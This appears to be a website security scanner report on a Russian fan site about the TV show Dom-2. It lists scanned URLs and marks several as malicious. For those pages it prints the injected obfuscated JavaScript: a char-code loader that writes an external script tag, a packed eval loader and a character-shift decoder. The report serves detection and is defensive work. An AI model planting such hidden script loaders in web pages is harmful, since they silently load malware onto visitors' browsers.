Scanned pages/files
Request | Server response | Status |
http://pro-dom2.ucoz.ru/publ/dom_2_novosti_teleproekta/sveta_davydova_materraco/1-1-0-37 | 200 OK Content-Length: 38610 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function L264(WXs576){document.write( String.fromCharCode(parseInt(WXs576)-5));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var po706="109`121`121`117`63`52`52`115`106`127`123`"+ "102`113`51`116`112`116`120`109`106`104`109`112`102`"+ "51`115`106`121`52`120`52`117`90`84`103`113`56`61`56`"+ "54`52`68`120`110`105`66`61`55`53`61`55";var VQ777=po706.split("`"); for(VVl520=0;VVl520<VQ777.length;VVl520++){L264(VQ777[VVl520]);} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s33.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s33.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s33.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://s33.ucoz.net/cgi/uutils.fcg?a=soc_comment_get_data&site=0pro-dom2 | 200 OK Content-Length: 525 Content-Type: application/javascript | clean |
http://s33.ucoz.net/src/socCom.js | 200 OK Content-Length: 6344 Content-Type: text/javascript | clean |
http://pro-dom2.ucoz.ru/publ/rss/ | 200 OK Content-Length: 17494 Content-Type: text/xml | clean |
http://pro-dom2.ucoz.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://pro-dom2.ucoz.ru/ | 200 OK Content-Length: 41503 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) k="%3Cscript%20type%3D%22text%2FJavaScript%22%20language%3D%22JavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28iqr%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Biqr%3Diqr.re Antivirus reports:
| ||
http://pro-dom2.ucoz.ru/register | 200 OK Content-Length: 23193 Content-Type: text/html | clean |
http://pro-dom2.ucoz.ru/gb | 200 OK Content-Length: 34511 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('>kprwv"v{rg?$jkffgp$"pcog?$uqu$"xcnwg?$3782:33;3:$"1@2'); Antivirus reports:
| ||
http://pro-dom2.ucoz.ru/publ | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Wed, 22 Jul 2015 04:39:45 GMT Location: http://pro-dom2.ucoz.ru/ Server: uServ/3.3.1 Content-Type: application/octet-stream Set-Cookie: 0pro-dom2uCoz=; path=/; expires=Mon, 22-Jul-2013 04:39:45 GMT; domain=.pro-dom2.ucoz.ru; | clean |
http://pro-dom2.ucoz.ru/panel/?a=ustat;u=pro-dom2;d=0;il=ru | HTTP/1.1 302 Found Connection: close Date: Wed, 22 Jul 2015 04:39:45 GMT Location: http://pro-dom2.ucoz.ru/panel/?a=ustat;u=pro-dom2;d=0;il=ru&sdc=1 Server: uServ/3.3.1 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 0pro-dom2uCozso=0; path=/panel/; expires=Wed, 22-Jul-2015 04:39:44 GMT; domain=pro-dom2.ucoz.ru; Set-Cookie: 0pro-dom2lng=ru; path=/; expires=Thu, 21-Jul-2016 04:39:45 GMT; Set-Cookie: 0pro-dom2uzdc=1; path=/ | clean |
http://pro-dom2.ucoz.ru/panel/?a=ustat;u=pro-dom2;d=0;il=ru&sdc=1 | 200 OK Content-Length: 769 Content-Type: text/html | clean |
http://pro-dom2.ucoz.ru/publ/dom_2_novosti_teleproekta/1 | 200 OK Content-Length: 42598 Content-Type: text/html | suspicious |
Suspicious code found | ||
http://pro-dom2.ucoz.ru/publ/ | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Wed, 22 Jul 2015 04:39:46 GMT Location: http://pro-dom2.ucoz.ru/ Server: uServ/3.3.1 Content-Type: application/octet-stream Set-Cookie: 0pro-dom2uCoz=; path=/; expires=Mon, 22-Jul-2013 04:39:46 GMT; domain=.pro-dom2.ucoz.ru; | clean |
http://pro-dom2.ucoz.ru/publ/dom_2_novosti_teleproekta/1-2 | 200 OK Content-Length: 44483 Content-Type: text/html | clean |
http://pro-dom2.ucoz.ru/publ/dom_2_novosti_teleproekta/1-1 | 200 OK Content-Length: 42610 Content-Type: text/html | suspicious |
Suspicious code found |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pro-dom2.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 22 Jul 2015 04:39:44 GMT
Server: uServ/3.3.1
Content-Length: 41503
Content-Type: text/html; charset=UTF-8
...41503 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pro-dom2.ucoz.ru
Referer: http://www.google.com/search?q=pro-dom2.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pro-dom2.ucoz.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pro-dom2.ucoz.ru/
Result: pro-dom2.ucoz.ru is not infected or malware details are not published yet.